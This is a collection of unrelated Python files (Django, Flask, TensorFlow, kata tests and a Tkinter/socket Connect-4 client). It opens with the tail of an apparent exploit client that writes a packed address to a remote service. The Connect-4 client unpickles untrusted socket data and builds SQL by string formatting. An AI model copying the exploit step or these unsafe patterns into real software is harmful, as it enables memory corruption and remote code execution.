print 'received: %s' % data
sock.sendall("1")
data = sock.recv(1024)
print 'received: %s' % data
# overwrite
data = sock.recv(1024)
print 'received: %s' % data
sock.sendall("3")
data = sock.recv(1024)
print 'received: %s' % data
message = struct.pack("<Q", address)
print 'sending: %s' % message
sock.sendall(message)
data = sock.recv(1024)
print 'received: %s' % data
# print
data = sock.recv(1024)
print 'received: %s' % data
sock.sendall("4")
data = sock.recv(1024)
print 'received: %s' % data
finally:
print 'closing socket'
sock.close()
|
from django.shortcuts import render
from course_management_app.forms import StudentProfileInfoForm , CourseForm
def index(request):
return render(request,'course_management_app/index.html')
# Create your views here.
def userdetails(request):
stude_form = StudentProfileInfoForm()
course_form = CourseForm()
# assignment_form = AssignmentForm()
return render(request,'course_management_app/user.html',{'stude_form':stude_form,'course_form':course_form,})
|
"""(a) Write a function to print the first N numbers of the Fibonacci sequence.
(b) Write a function to print the Nth number of the sequence."""
def fibonacci_sequence(n_series):
term_1 , term_2 = 1, 1
n_term = 0
count = n_series
while count >= 0:
n_term = term_1 + term_2
term_2 = term_1
term_1 = n_term
print(n_term, 'yes')
count -=1
def recursive_fibonacci(n_seiries):
if n_seiries == 0 or n_seiries == 1:
return n_seiries
else:
return recursive_fibonacci(n_seiries - 1) + recursive_fibonacci(n_seiries - 2)
def main():
n_series = int(input("Enter a series "))
# fibonacci_sequence(n_series)
nth_term = recursive_fibonacci(n_series)
print(nth_term)
if __name__ == '__main__':
main()
|
import unittest
from katas.kyu_7.calculate_meal_total import calculate_total
class CalculateTotalTestCase(unittest.TestCase):
def test_equal_1(self):
self.assertEqual(calculate_total(5.00, 5, 10), 5.75)
def test_equal_2(self):
self.assertEqual(calculate_total(36.97, 7, 15), 45.10)
def test_equal_3(self):
self.assertEqual(calculate_total(0.00, 6, 18), 0.00)
def test_equal_4(self):
self.assertEqual(calculate_total(80.94, 0, 20), 97.13)
def test_equal_5(self):
self.assertEqual(calculate_total(54.96, 8, 0), 59.36)
|
import wx
serverMsgAttr = wx.TextAttr(wx.Colour(128, 0, 0))
clientMsgAttr = wx.TextAttr(wx.Colour(0, 0, 128))
plainMsgAttr = wx.TextAttr(wx.Colour(0, 0, 0))
class MSSPInfo(wx.Dialog):
def __init__(self, conn):
worldname = conn.world.get('name')
wx.Dialog.__init__(self, conn, title = "MSSP Info: " + worldname,
style = wx.RESIZE_BORDER | wx.DEFAULT_DIALOG_STYLE
)
self.connection = conn
self.output_pane = wx.StaticText(self)
# TODO - the MSSP messages should live somewhere else, like in telnetiac.mssp or something
self.mssp_msgs = {}
sizer = wx.BoxSizer( wx.VERTICAL )
sizer.Add(self.output_pane, 1, wx.ALL|wx.GROW, 10)
self.SetSizer(sizer)
self.connection.status_bar.feature_icons['MSSP'].Bind(wx.EVT_LEFT_UP, self.toggle_visible)
self.update()
def toggle_visible(self, evt = None):
self.update()
self.Fit()
self.CenterOnParent()
self.Show(not self.IsShown())
if evt: evt.Skip()
def Close(self):
self.toggle_visible()
def add_message(self, msg):
for k,v in msg.items():
self.mssp_msgs[k] = v
self.update()
def update(self):
output = ''
for k in sorted(self.mssp_msgs.keys()):
output += f"{k}: {self.mssp_msgs[k]}\n"
self.output_pane.SetLabel(output)
|
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings('ignore')
data = np.loadtxt('../../data/data-01.csv', delimiter=",")
# print(data)
# 2차원 데이터로 뽑아오기
# matrix 연산을 하기 위해서는 2차원 텐서로 되어야 한다.
x_data = data[:, :-1]
# y_data = data[:, -1:]
y_data = data[:, [-1]]
print("x_data shape : ", x_data.shape)
print("y_data shape : ", y_data.shape)
w = tf.Variable(tf.random_uniform([3, 1]))
b = tf.Variable(tf.random_uniform([1]))
X = tf.placeholder(dtype=tf.float32, shape=(None, 3))
y = tf.constant(y_data, dtype=tf.float32)
hx = tf.matmul(X, w) + b
cost = tf.reduce_mean(tf.square(hx - y))
optimizer = tf.train.GradientDescentOptimizer(0.000001)
train = optimizer.minimize(cost)
sess = tf.Session()
init = tf.global_variables_initializer()
sess.run(init)
for i in range(10000):
sess.run(train, feed_dict={X: x_data})
if not i % 100:
print(i, sess.run(cost, feed_dict={X: x_data}))
sess.run(w)
# 100, 98, 81 경우 점수 예측
print(sess.run(hx, feed_dict={X: [[100, 98, 81]]}))
# 73, 80, 75
# 93, 88, 93 경우 점수 예측
print(sess.run(hx, feed_dict={X: [[73, 80, 75], [93, 88, 93]]}))
|
from collections import defaultdict
instances = defaultdict(list)
instances['InsLocation'].append('roomA')
instances['InsLocation'].append('roomB')
print(instances)
for key, value in instances.items():
print(key)
print(value)
print('---')
|
'''Редактирование строк'''
my_array = [14, 92, 13, 58, 25, 61, 26]
my_string = '14, 92, 13,'
my_array[2] = 'тринадцать'
print(my_array)
'''Чтобы заменить символ в строке, используем
метод
⭐️ - .replace('x', 'y', n) - меняем х на у n раз'''
clean_string = my_string.replace(',', '', 2)
print(clean_string)
|
import os
import sys
import getopt
def walkDir(dir):
generator_ = os.walk(dir)
for rootDir, pathList, fileList in generator_ :
for f in fileList:
#print(os.path.join(rootDir, f))
write2file_2(os.path.join(rootDir, f), ["blablablabla\n", "xxxxx\n"])
#def displayDir2(dir):
# for i in os.listdir(dir):
# file = os.path.join(dir,i)
# if os.path.isdir(file):
# displayDir2(file)
# else:
# print file
def write2file(filepath, str_):
f = open(filepath, 'r+')
original_content = f.read()
f.seek(0)
print("original content: " + original_content)
new_content = str_ + '\n' + original_content
print("new content: " + new_content)
f.write(new_content)
f.close()
def write2file_2(filepath, strList):
f = open(filepath, 'r+')
content = f.readlines()
#content = ["blablabla\n", "lskdfsdk\n", "xxxxx\n"] + content
content = strList + content
f.seek(0)
f.writelines(content)
f.close()
def print_tree_(dir_, parent_prefix, current_level, depth, only_dir):
'''
print the guide line of 'dir_' for 'depth'.
dir_ : the directory to print
parent_prefix : the string attach in front of the guide line, '' is recommanded
current_level : the starting level, 0 is recommanded
depth : 0 or less mean NO depth limited
only_dir : true if only print directory
Thoughts:
For every line to print, first print the parent's prefix,
then print the own prefix, and at last, print the name of files/dirs.
'''
if depth > 0 and current_level >= depth:
return None
# current_level starts from 0, depth starts from 1.
current_level += 1
NORMAL_PREFIX = '|-- '
NORMAL_PREFIX_4_CHILDREN = '| '
LAST_PREFIX = '|-- '
LAST_PREFIX_4_CHILDREN = ' '
# TODO: now the list is sorted by alphabeta, they can also be sorted by other.
# e.g. sorted by modified time.
child_list = os.listdir(dir_)
child_list_size = len(child_list)
index = 0
while(index < child_list_size):
child_name = child_list[index]
child_path = os.path.join(dir_, child_name)
if os.path.isdir(child_path):
# deal with the non-last children of THIS level. For files, this will be the same.
if index < child_list_size - 1:
print(parent_prefix + NORMAL_PREFIX + str(child_name) + '\n', end='')
print_tree_(child_path, parent_prefix + NORMAL_PREFIX_4_CHILDREN, current_level, depth, only_dir)
# deal with the last child of THIS level, sometimes, its prefix is different from prefix of others.
# For files, this will be the same.
else:
print(parent_prefix + LAST_PREFIX + str(child_name) + '\n', end='')
print_tree_(child_path, parent_prefix + LAST_PREFIX_4_CHILDREN, current_level, depth, only_dir)
else:
if not only_dir:
if index < child_list_size - 1:
print(parent_prefix + NORMAL_PREFIX + str(child_name) + '\n', end='')
else:
print(parent_prefix + LAST_PREFIX + str(child_name) + '\n', end='')
index += 1
def print_tree():
'''Usage:
utils.py [--dir=xxx] [--depth=xxx] [--only_dir] [--help]
'''
# these are the default values.
dir_ = '.'
depth = 0
only_dir = False
# short argv list must provided to 'getopt'
shortargv = ''
longargv = ['dir=', 'depth=', 'only-dir', 'help']
try:
(opts, args) = getopt.getopt(sys.argv[1:], shortargv, longargv)
except getopt.GetoptError as e:
print("Errors accured when get options using 'getopt', please check out your options.")
print("Error:: opt: " + e.opt)
print("Error:: msg: " + e.msg)
return None
for (opt, val) in opts:
if opt == '--help':
print("Usage: utils.py [--dir=xxx] [--depth=xxx] [--only_dir] [--help]")
return None
elif opt == '--dir' and len(val) > 0:
dir_ = val
elif opt == '--depth' and len(val) > 0 and int(val) > 0:
depth = int(val)
elif opt == '--only_dir':
only_dir = True
if not os.path.isdir(dir_):
print(str(dir_) + " is not a directory.")
return None
print(dir_)
print_tree_(dir_, '', 0, depth, only_dir)
def filter_files(base_folder, filtered_folder):
'''filter files in filtered_folder. If a file is in base_folder,
then filter out it from filtered_folder if exists.
e.g. filter_files('res/hdpi/', 'res/xhdpi/')
filter files which are in hdpi/ out from xhdpi/ if exists.
'''
if not os.path.isdir(base_folder) or not os.path.isdir(filtered_folder):
print("Make sure both '%s' and '%s' are folders." % (str(base_folder), str(filtered_folder)))
return None
file_list_base = os.listdir(base_folder)
file_list_addon = os.listdir(filtered_folder)
count = 0
for x in file_list_addon:
path = os.path.join(filtered_folder, x)
#path = os.path.realpath(x)
if os.path.isfile(path) and x in file_list_base:
os.remove(path)
count += 1
print("delete %d files." % count)
if __name__ == '__main__':
#walkDir("E:/python/tmp")
#print_tree()
filter_files('tmp_1', '')
|
#Test loading in training data
import os
import sys
#Path hack
dir_path = os.path.dirname(os.path.realpath(__file__))
parent_path = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
sys.path.append(parent_path)
#Load modules
from DeepForest.utils.generators import create_NEON_generator, load_training_data, load_retraining_data, create_h5_generators
from DeepForest import config
DeepForest_config = config.load_config(dir="..")
def test_train():
data = load_training_data(DeepForest_config)
print("Data shape is {}".format(data.shape))
assert data.shape[0] > 0, "Data is empty"
def test_retrain():
data = load_retraining_data(DeepForest_config)
print("Data shape is {}".format(data.shape))
assert data.shape[0] > 0, "Data is empty"
test_train()
test_retrain() |
from django.urls import path
from . import views
urlpatterns=[
path("",views.index,name='index'),
path("<int:fid>",views.flight,name='flight'),
path("<int:fid>/book",views.book,name="book"),
]
|
from gensim.models import word2vec
import numpy as np
import pandas as pd
import os
import re
import pickle
import copy
import sys
from time import sleep
max_length = 50 #max nr of words in sentence
vec_length = 100 #dimensions in word vector
#track movie characters, to differentiat speaker and listener
def init_movie_characters():
movie_user_dataset = pd.read_csv('../res/cornell/movie_characters_metadata.csv', sep=';')
characters = {}
for r in movie_user_dataset.iterrows():
idx = r[1]['Id'].lstrip().rstrip()
name = r[1]['Name'].lstrip().rstrip().lower().split(' ')
characters[idx] = name
return characters
#return the wordvector of word if it is known
def VEC(word):
try:
return (True,np.array(w2v_model.wv[word]))
except KeyError:
return (False,None)
#initialize w2v and IDF models
w2v_model = word2vec.Word2Vec.load('../res/word2vec/semspace')
idf_model = np.load('../res/word2vec/idf.npy').item()
#load the dataset with parsed movie lines
with open('movie_lines.p','rb') as f:
movie_lines = pickle.load(f)
#load the dataset with movie conversations. Conversations are represented as a list of movie lines corresponding with
# keys in movie_lines
movie_conversations = pd.read_csv('../res/cornell/movie_conversations.csv',sep=';')
movie_characters = init_movie_characters()
movie_line_strings = {}
with open('../res/cornell/movie_lines.txt','r') as f:
for line in f:
columns = line.split(' +++$+++ ')
movie_line_strings[columns[0]] = columns[4].lstrip().rstrip()
#track number of entries for progress reporting
total = movie_conversations['Person1'].count()
j = 0.
#construct the conversation dataset
conversation_dataset = {}
for r in movie_conversations.iterrows():
sleep(0.0001) #save some CPU space
print(j/total*100, ' % ', end='\r')
j += 1
#keep a buffer of word vectors on hand, so that context information from previous sentences can be
#input in the rnn along with the current sentence
word_buffer = [ np.zeros(100) for _ in range(100) ]
#try to recognise when a character is talking about themselves or directly at the listener,
#if so, replace their names with names more suitable for the chatbot scenario
person1 = movie_characters[ r[1]['Person1'].lstrip().rstrip() ]
person2 = movie_characters[ r[1]['Person2'].lstrip().rstrip() ]
line_numbers = re.sub('[^L0-9 ]+','',r[1]['Lines'].lstrip().rstrip()).split(' ')
conversation = [ (line_idx,movie_lines[line_idx+' ']) for line_idx in line_numbers ]
sentences = []
for i,(line_idx,sentence) in enumerate(conversation):
speaker = person1 if sentence['user'].lstrip().rstrip() == r[1]['Person1'].lstrip().rstrip() else person2
listener = person2 if speaker == person1 else person1
line = sentence['line']
try:
for speaker_name in speaker:
line = [re.sub(' '+speaker_name+'\)', ' brepo)', word) for word in line ]
for listener_name in listener:
line = [re.sub(' '+listener_name+'\)', ' human)', word) for word in line ]
except KeyError:
raise
except Exception as e:
print(e)
print("I fucked up with",speaker, "or", listener)
sentence_word_vector = []
for word in line:
try:
word_vec = w2v_model.wv[word] * idf_model[word]
sentence_word_vector.append(word_vec)
except KeyError:
continue
#the meaning of a sentence is represented as the mean of the word vectors multiplied with the idf of the word
sentence_vector = np.mean( np.array(sentence_word_vector) , axis=0 )
#keep track of the original line
sentence_string = movie_line_strings[line_idx]
#store which movie line is the desired response to this sentence
next_line_idx = None if i+1 >= len(conversation) else conversation[i+1][0]
#store in dictionary
conversation_dataset[line_idx] = { 'line_idx':line_idx,
'sentence_string':sentence_string,
'sentence_word_vector':sentence['line'],
'sentence_vector':sentence_vector,
'next_line_idx':next_line_idx}
#save dictionary
with open('../res/word2vec/conversation_dataset.p','w+b') as fp:
pickle.dump(conversation_dataset,fp,protocol=pickle.HIGHEST_PROTOCOL)
|
import os
import sys
def split_file(path, neighbourhood):
# splitLen = 4
f = open(f'{path}\{neighbourhood[0]}.txt','r').read().split('\n')
length = len(neighbourhood) - 1
print(length)
linetotal = len(f)
print(linetotal)
splitLen = int(linetotal / length)
print(splitLen)
i = 1
for lines in range(0, len(f), splitLen):
slpitdata = f[lines: lines + splitLen]
output = open(f'{path}/{neighbourhood[i]}.txt', 'w')
output.write('\n'.join(slpitdata))
output.close()
i += 1
print("succesfully splited")
if __name__=="__main__":
lis = sys.argv[2:]
o_path = os.path.abspath(os.path.realpath(sys.argv[1]))
path = (f'{o_path}\{lis[0]}')
split_file(path, lis) |
from django.contrib import admin
from .models import Submission, Conference
admin.site.register(Submission)
admin.site.register(Conference) |
from unittest import TestCase
from mdat import core
__author__ = 'pbc'
class TestChoquetIntegral(TestCase):
def test_get_criteria_keys_sorted_by_value(self):
criteria = {'c1': .6, 'c2': .8, 'c3': .9, 'c4': .2}
expected_key_order = ['c4', 'c1', 'c2', 'c3']
ci = core.ChoquetIntegral(criteria=criteria)
ci.get_criteria_keys_sorted_by_value()
# verify the correct attribute is set
self.assertEqual(ci.criteria_keys_sorted_by_value, expected_key_order)
# verify the correct array is returned is set
self.assertEqual(ci.get_criteria_keys_sorted_by_value(), expected_key_order)
def test_calculate(self):
criteria = {'c1': .6, 'c2': .8, 'c3': .9, 'c4': .2}
fuzzyMeasure = {
frozenset(['c3', 'c4']): 0.32,
frozenset(['c3', 'c2', 'c4']): 0.56,
frozenset(['c3', 'c1']): 0.98,
frozenset(['c3', 'c2']): 0.27,
frozenset([]): 0,
frozenset(['c3', 'c1', 'c4']): 0.98,
frozenset(['c2']): 0.2375,
frozenset(['c3', 'c2', 'c1', 'c4']): 1,
frozenset(['c3', 'c2', 'c1']): 0.99,
frozenset(['c1']): 0.325,
frozenset(['c2', 'c1']): 0.81,
frozenset(['c2', 'c1', 'c4']): 0.99,
frozenset(['c4']): 0.25,
frozenset(['c1', 'c4']): 0.97,
frozenset(['c2', 'c4']): 0.27,
frozenset(['c3']): 0.1875
}
expected_ChoquetIntegral = 0.66875
ci = core.ChoquetIntegral(criteria=criteria, fuzzyMeasure=fuzzyMeasure)
self.assertAlmostEquals(ci.calculate(), expected_ChoquetIntegral)
# Run second test
criteria = {
'c1': 0.2,
'c2': 0.4,
'c3': 0.1
}
fuzzyMeasure = {
frozenset([]): 0,
frozenset(['c1']): 0.391304347826087,
frozenset(['c2']): 0.3478260869565218,
frozenset(['c3']): 0.2608695652173913,
frozenset(['c1', 'c2']): 0.7683779330072605,
frozenset(['c1', 'c3']): 0.8093446720056068,
frozenset(['c2', 'c3']): 0.41548536225285937,
frozenset(['c1', 'c2', 'c3']): 1
}
expected_ChoquetIntegral = 0.2464030107
ci2 = core.ChoquetIntegral(criteria=criteria, fuzzyMeasure=fuzzyMeasure)
self.assertAlmostEquals(ci2.calculate(), expected_ChoquetIntegral)
|
from dataStore import dataStore
fileAccess = ["/home/anushabangi/test1.py", "/home/anushabangi/test2.py"]
inodes = ["testnode1", "testnode2"]
computationTime = [19.00, 20.00]
dataObject = dataStore(fileAccess,inodes,computationTime)
print("Printing Object Values ...")
dataObject.showData()
print("Printing file dictionary")
dataObject.fileData()
|
from flask import Blueprint, request
from sqlalchemy.exc import SQLAlchemyError
import json
from app.models import Loan, db
from app.utils.error_handling import make_error, check_types, check_types_with_none
loan_routes = Blueprint("loan", __name__)
@loan_routes.route("/<int:id>", methods=["GET"])
def get_loan(id):
try:
loan = Loan.query.get(id)
if loan :
return loan.to_dict(), 200
else:
return make_error(400, "Loan Not Found")
except SQLAlchemyError as e:
return make_error(500, f'Internal Server Error: {repr(e)}')
@loan_routes.route("/<int:id>", methods=["PUT"])
def update_loan(id):
try:
loan = Loan.query.get(id)
payload = json.loads(request.data)
error = check_types_with_none(payload)
if(error): return error
loan.amount = payload["amount"] if "amount" in payload else loan.amount
loan.interest_rate = payload["interest_rate"] if "interest_rate" in payload else loan.interest_rate
loan.loan_length = payload["loan_length"] if "loan_length" in payload else loan.loan_length
loan.monthly_payment = payload["monthly_payment"] if "monthly_payment" in payload else loan.monthly_payment
db.session.commit()
return {"message": "Loan updated",
"loan": loan.to_dict()}, 200
except (ValueError, KeyError, TypeError) as e:
db.session.rollback()
return make_error(400, f'JSON Format Error: {repr(e)}')
except SQLAlchemyError as e:
db.session.rollback()
return make_error(500, f'Internal Server Error: {repr(e)}')
@loan_routes.route("/<int:id>", methods=["DELETE"])
def delete_loan(id):
try:
loan = Loan.query.get(id)
if loan :
db.session.delete(loan)
db.session.commit()
return {"message": "Delete Successful."}, 200
else:
db.session.rollback()
return make_error(400, "Loan not found")
except SQLAlchemyError as e:
db.session.rollback()
return make_error(500, f'Internal Server Error: {repr(e)}')
@loan_routes.route("/", methods=["GET"])
def get_loans():
try:
loans = Loan.query.all()
if loans:
return {loan.id: loan.to_dict() for loan in loans}, 200
else:
return make_error(400, "Loans not found")
except SQLAlchemyError as e:
return make_error(500, f'Internal Server Error: {repr(e)}'),
@loan_routes.route("/", methods=[ "POST"])
def create_loan():
try:
payload = json.loads(request.data)
error = check_types(payload)
if(error): return error
new_loan = Loan(
amount=payload["amount"],
interest_rate=payload["interest_rate"],
loan_length=payload["loan_length"],
monthly_payment=payload["monthly_payment"],
)
db.session.add(new_loan)
db.session.commit()
return {"message": "Loan Created",
"loan": new_loan.to_dict()}, 201
except (ValueError, KeyError, TypeError) as e:
db.session.rollback()
return make_error(400, f'JSON Format Error: {repr(e)}')
except SQLAlchemyError as e:
db.session.rollback()
return make_error(500, f'Internal Server Error: {repr(e)}')
|
'''
Created on Mar 28, 2015
@author: anthonydito
'''
import cPickle
import logging
import psycopg2
import socket
import threading
from Tkinter import *
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-15s) %(message)s',
)
class aiUser(Frame):
def __init__(self, parent):
Frame.__init__(self, parent)
self.parent = parent
try:
self.insock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
logging.debug('Failed to create socket. Error code: '
+ str(msg[0]) + ' , Error message : '
+ msg[1]
)
try:
self.outsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
logging.debug('Failed to create socket. Error code: '
+ str(msg[0]) + ' , Error message : '
+ msg[1]
)
self.needProcessing = []
self.BOX_WIDTH = 70
self.inPort = 8887
self.outPort = 8888
self.gameBoard = [[0 for __ in range(6)] for _ in range(7)] #gameboard[col][row]
self.moves = ""
self.turn = 1
self.colors = ("black", "red")
self.gameOver = False
self.initSockets()
self.initDatabase()
self.initUI()
def initSockets(self):
self.inThread = threading.Thread(target=lambda:self.inRunner())
self.inThread.daemon = True
self.inThread.start()
self.outInitThread = threading.Thread(target=lambda:self.initOutSock())
self.outInitThread.daemon = True
self.outInitThread.start()
def initDatabase(self):
self.databaseConn = psycopg2.connect(database="connect4", user="anthonydito")
self.databaseCurr = self.databaseConn.cursor()
def initOutSock(self):
try:
self.outsock.bind(("0.0.0.0", self.outPort))
self.outsock.listen(1)
self.outConn, addr = self.outsock.accept()
logging.info("Connected with " + addr[0] + ":" + str(addr[1]))
except Exception, e:
logging.debug(e)
#Might want to put some other code here.
def initUI(self):
self.parent.title("AI Connect 4 - Anthony Dito")
self.pack(fill=BOTH, expand=1)
for col in range(7):
b = Button(self, command=lambda col=col:self.move(col, 1), width=6)
b.place(x=44+(col * self.BOX_WIDTH), y=15)
w = self.BOX_WIDTH * 7
h = self.BOX_WIDTH * 6
self.can = Canvas(self, width=w+20, height=h+20)
for i in range(8):
self.can.create_line(4+i*self.BOX_WIDTH, 0, 4 + i * self.BOX_WIDTH, h+4, width = 2)
for i in range(7):
self.can.create_line(0, 4+i*self.BOX_WIDTH, w+4, 4+i*self.BOX_WIDTH, width =2)
self.can.place(x=40, y=40)
self.textBoxUserMessage = Text(self, height=13, width=50)
self.textBoxUserMessage.place(x=w+60, y=50)
self.textBoxUserMessage.config(state=DISABLED, background="snow2")
self.textBoxSystemMessage = Text(self, height=13, width=50)
self.textBoxSystemMessage.place(x=w+60, y=260)
self.textBoxSystemMessage.config(state=DISABLED, background="snow2")
self.e = Entry(self, width=40)
self.e.place(x=w+60, y=20)
self.b = Button(self, command=lambda:self.sendAndCreateDialogMessage(), text="send")
self.b.place(x=w+355, y=20)
self.e2 = Entry(self, width=40)
self.e2.place(x=w+420, y =20)
self.b2 = Button(self, command=lambda:self.sendVoiceMessage(), text="talk")
self.b2.place(x=w+715, y=20)
self.textBoxDatabaseInfo = Text(self, height=29, width=50)
self.textBoxDatabaseInfo.place(x=w+420, y=50)
self.textBoxDatabaseInfo.config(state=DISABLED, background="snow2")
self.parent.geometry("1300x550+100+100")
def redoCanvas(self):
w = self.BOX_WIDTH * 7
h = self.BOX_WIDTH * 6
for i in range(8):
self.can.create_line(4+i*self.BOX_WIDTH, 0, 4 + i * self.BOX_WIDTH, h+4, width = 2)
for i in range(7):
self.can.create_line(0, 4+i*self.BOX_WIDTH, w+4, 4+i*self.BOX_WIDTH, width=2)
def resetGUI(self):
self.textBoxDatabaseInfo.config(state=NORMAL)
self.textBoxDatabaseInfo.delete("1.0", END)
self.textBoxDatabaseInfo.config(state=DISABLED)
self.textBoxSystemMessage.config(state=NORMAL)
self.textBoxSystemMessage.delete("1.0", END)
self.textBoxSystemMessage.config(state=DISABLED)
self.textBoxUserMessage.config(state=NORMAL)
self.textBoxUserMessage.delete("1.0", END)
self.textBoxUserMessage.config(state=DISABLED)
self.can.delete("all")
self.redoCanvas()
self.e.delete(0, END)
self.e2.delete(0, END)
def ai(self):
t = threading.Thread(target=lambda:self.runAi())
t.daemon = True
t.name = "db_thread"
t.start()
def runAi(self):
IS_OPPONENT_MULTIPLIER = 2
self.databaseCurr.execute("SELECT outcome, user_against, moves FROM games WHERE moves LIKE '%s%%'" % self.moves)
row = self.databaseCurr.fetchone()
if row == None:
self.displayNoInfoMessage()
return
#0 - number of ties, 1 - number of wins, 2 - number of losses, 3-score, 4 - number with user matching
columnInfo = [[0 for __ in range(5)] for _ in range(7)]
while row != None:
outcome = row[0]
user_against = row[1]
moves = row[2]
lenGameMoves = len(self.moves)
if (len(moves) - lenGameMoves <= 1):
self.displayWinMove(moves[lenGameMoves])
return
nextMove = int(moves[lenGameMoves])
if outcome == 0:
columnInfo[nextMove][0] += 1
elif outcome == 1:
columnInfo[nextMove][1] += 1
score = 50
score -= (len(moves) - lenGameMoves)
if user_against == self.opponentUsername:
score *= IS_OPPONENT_MULTIPLIER
columnInfo[nextMove][4] += 1
columnInfo[nextMove][3] += score
elif outcome == 2:
columnInfo[nextMove][2] += 1
score = -50
score += (len(moves) - lenGameMoves)
if user_against == self.opponentUsername:
score *= IS_OPPONENT_MULTIPLIER
columnInfo[nextMove][4] += 1
columnInfo[nextMove][3] += score
row = self.databaseCurr.fetchone()
self.textBoxDatabaseInfo.config(state = NORMAL)
self.textBoxDatabaseInfo.delete("1.0", END)
sumTotals = 0
for idx, col in enumerate(columnInfo):
ties = col[0]
wins = col[1]
losses = col[2]
score = col[3]
numberWithUser = col[4]
total = (ties + wins + losses)
sumTotals += total
line1 = "Column %d - total: %d - v. opponent: %d\n" % (idx, total, numberWithUser)
line2 = "ties: %d - wins: %d - losses: %d\n" % (ties, wins, losses)
line3 = "score: %d\n" % score
line4 = "------------------------------\n"
self.textBoxDatabaseInfo.insert(END, line1)
self.textBoxDatabaseInfo.insert(END, line2)
self.textBoxDatabaseInfo.insert(END, line3)
self.textBoxDatabaseInfo.insert(END, line4)
self.textBoxDatabaseInfo.config(state = DISABLED)
self.insertSystemMessage("Found %d in database." % sumTotals)
def displayWinMove(self, col):
self.insertSystemMessage("THERE IS A WINNING MOVE AT " + col)
self.textBoxDatabaseInfo.config(state=NORMAL)
self.textBoxDatabaseInfo.delete("1.0", END)
self.textBoxDatabaseInfo.insert("1.0", "THERE IS A WINNING MOVE AT " + col)
self.textBoxDatabaseInfo.config(state=NORMAL)
def inRunner(self):
try:
self.insock.bind(("0.0.0.0", self.inPort))
self.insock.listen(1)
self.inConn, addr = self.insock.accept()
logging.info("Connected with " + addr[0] + ":" + str(addr[1]))
while True:
reply = self.inConn.recv(4096)
self.messageProcessor(reply)
except Exception, e:
logging.debug(e)
def messageProcessor(self, encodedMessage):
message = cPickle.loads(encodedMessage)
code = message[0]
if code == 4:
col = message[1]
self.move(col, 2)
elif code == 2:
dialogMessage = message[1]
self.insertDialogMessage(self.opponentUsername + ": " + dialogMessage)
elif code == 7:
self.opponentUsername = message[1]
self.insertSystemMessage("Playing: " + self.opponentUsername)
self.ai()
elif code == 8:
self.askNewGame()
def sendAndCreateDialogMessage(self):
message = self.e.get()
if len(message) > 0:
self.e.delete(0, END)
self.insertDialogMessage("You: " + message)
self.sendMessage((2, message))
def sendVoiceMessage(self):
message = self.e2.get()
if len(message) > 0:
self.e2.delete(0, END)
self.insertSystemMessage("Sent voice: " + message)
self.sendMessage((6, message))
def sendMessage(self, message):
pickledMessage = cPickle.dumps(message, protocol=0)
self.outConn.sendall(pickledMessage)
def insertSystemMessage(self, message):
self.textBoxSystemMessage.config(state=NORMAL)
self.textBoxSystemMessage.insert("1.0", message + "\n")
self.textBoxSystemMessage.config(state=DISABLED)
def insertDialogMessage(self, message):
self.textBoxUserMessage.config(state=NORMAL)
self.textBoxUserMessage.insert("1.0", message + "\n")
self.textBoxUserMessage.config(state=DISABLED)
def displayNoInfoMessage(self):
self.textBoxDatabaseInfo.config(state = NORMAL)
self.textBoxDatabaseInfo.delete("1.0", END)
self.textBoxDatabaseInfo.insert("1.0", "NO INFO")
self.textBoxDatabaseInfo.config(state=DISABLED)
def move(self, col, user):
if self.gameOver:
return
if user != self.turn:
if user == 1:
self.insertSystemMessage("It is not your turn.")
return
else:
self.insertSystemMessage("Opponent attempted move and was denied.")
self.sendMessage((1, "It is not your turn."))
return
for spot, value in enumerate(reversed(self.gameBoard[col])):
spot = 5 - spot
if (value == 0):
#spot is the row
self.makeTheMove(col, spot, user)
return
if user == 1:
self.insertSystemMessage("That is not a valid move.")
else:
self.sendMessage((1, "That is not a valid move"))
def makeTheMove(self, col, row, user):
self.sendMessage((0, col, row, user))
self.gameBoard[col][row] = user
self.moves += str(col)
self.can.create_oval(
4+(col*self.BOX_WIDTH),
4+(row*self.BOX_WIDTH),
4+((col + 1)*self.BOX_WIDTH),
4+((row + 1)*(self.BOX_WIDTH)),
fill=self.colors[user-1],
outline=self.colors[user-1],
)
self.switchUser()
winner = self.checkWinner()
if winner != -1:
self.endGame(winner)
elif self.turn == 1:
self.ai()
def checkWinner(self):
foundZero = False
for col in range(7):
if self.gameBoard[col][0] == 0:
foundZero = True
break
if not foundZero:
return 0
for row in range(6):
currPiece = -1
currStreak = 0
for col in range(7):
piece = self.gameBoard[col][row]
if piece == currPiece:
currStreak += 1
if currStreak == 4:
return piece
elif piece != 0:
currPiece = piece
currStreak = 1
else:
currPiece = -1
currStreak = 0
for col in range(7):
currPiece = -1
currStreak = 0
for row in range(6):
piece = self.gameBoard[col][row]
if piece == currPiece:
currStreak += 1
if currStreak >= 4:
return piece
elif piece != 0:
currPiece = piece
currStreak = 1
else:
currPiece = -1
currStreak = 0
#This is a forward diagnol like a frontslash
for row in range(3):
col = 0
currPiece = -1
currStreak = 0
while (row < 6 and col < 7):
piece = self.gameBoard[col][row]
if piece == currPiece:
currStreak += 1
if currStreak >= 4:
return piece
elif piece != 0:
currPiece = piece
currStreak = 1
else:
currPiece = -1
currStreak = 0
row += 1
col += 1
for col in range(1, 4):
row = 0
currPiece = -1
currStreak = 0
while (row < 6 and col < 7):
piece = self.gameBoard[col][row]
if piece == currPiece:
currStreak += 1
if currStreak >= 4:
return piece
elif piece != 0:
currPiece = piece
currStreak = 1
else:
currPiece = -1
currStreak = 0
row += 1
col += 1
#This is checking like a backslash
for row in reversed(range(3, 6)):
col = 0
currPiece = -1
currStreak = 0
while (row >= 0 and col < 7):
piece = self.gameBoard[col][row]
if piece == currPiece:
currStreak += 1
if currStreak >= 4:
return piece
elif piece != 0:
currPiece = piece
currStreak = 1
else:
currPiece = -1
currStreak = 0
row -= 1
col += 1
for col in range(4):
row = 5
currPiece = -1
currStreak = 0
while (row >= 0 and col < 7):
piece = self.gameBoard[col][row]
if piece == currPiece:
currStreak += 1
if currStreak >= 4:
return piece
elif piece != 0:
currPiece = piece
currStreak = 1
else:
currPiece = -1
currStreak = 0
row -= 1
col += 1
return -1
def switchUser(self):
if self.turn == 1:
self.turn = 2
else:
self.turn = 1
def endGame(self, outcome):
self.insertGameInDatabase(outcome)
self.gameOver = True
self.insertSystemMessage("THE GAME IS OVER")
